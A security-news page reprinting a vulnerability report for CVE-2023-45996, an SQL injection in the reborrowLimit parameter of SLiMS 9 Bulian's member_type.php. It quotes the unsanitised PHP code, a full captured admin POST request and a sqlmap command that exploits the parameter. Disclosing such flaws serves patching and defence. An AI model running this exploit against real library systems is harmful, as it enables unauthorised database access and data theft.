Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-45996: Vuln0wned Report: SQL Injection in member_type.php · Issue #216 · slims/slims9_bulian

SQL injection vulnerability in Senayan Library Management Systems Slims v.9 and Bulian v.9.6.1 allows a remote attacker to obtain sensitive information and execute arbitrary code via a crafted script to the reborrowLimit parameter in the member_type.php.

CVE
#sql#csrf#vulnerability#web#windows#apple#php#chrome#webkit

The Bug

A SQL Injection has found in admin/modules/membership/member_type.php at the code below

$data['member_type_name'] = $dbs->escape_string($memberTypeName);
$data['loan_limit'] = trim($_POST['loanLimit']);
$data['loan_periode'] = trim($_POST['loanPeriode']);
$data['enable_reserve'] = $_POST['enableReserve'];
$data['reserve_limit'] = $_POST['reserveLimit'];
$data['member_periode'] = $_POST['memberPeriode'];
$data['reborrow_limit'] = $_POST['reborrowLimit'];
$data['fine_each_day'] = $_POST['fineEachDay'];
$data['grace_periode'] = $_POST['gracePeriode'];
$data['input_date'] = date('Y-m-d');
$data['last_update'] = date('Y-m-d');

To Reproduce

Steps to reproduce the behavior:

  1. Login as admin or user that has access membership type

  2. Make sure the burp application is turned on to capture the request as screenshot below

  3. Save the request in a separate file (sample.reg)
    sample.reg example

POST /slims9_bulian-9.6.1/admin/modules/membership/member_type.php?itemID=2&detail=true&ajaxload=1& HTTP/1.1
Host: localhost
Content-Length: 1420
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQUBKpazqdLdsHspa
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://localhost/slims9_bulian-9.6.1/admin/index.php?mod=membership
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SenayanAdmin=f5581i7ero1b1mitlh328upvmt; admin_logged_in=1; SenayanMember=37qocaml59lu0snk1tt3n74qgn
Connection: close

------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="csrf_token"

29ad9eb49edd5718652dff82f33e7ecb4000e5f376eac9d52346c6843c5b9d16
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="form_name"

mainForm
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="memberTypeName"

abcdef
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="loanLimit"

0
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="loanPeriode"

0
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="enableReserve"

1
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="reserveLimit"

0
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="memberPeriode"

1
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="reborrowLimit"

4423
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="fineEachDay"

1
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="gracePeriode"

0
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="saveData"

Update
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="updateRecordID"

2
------WebKitFormBoundaryQUBKpazqdLdsHspa--

run the test with the following command:

sqlmap -r example.req --level 5 --risk 3 -p reborrowLimit --random-agent --dbms=mysql --current-user
  1. You’ve entered into the system

Screenshots

Versions

  • OS: Windows
  • Browser: Brave Browser | Version 1.57.57 Chromium: 116.0.5845.163 (Official Build) (64-bit)
  • Slims Version: slims9_bulian-9.6.1

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907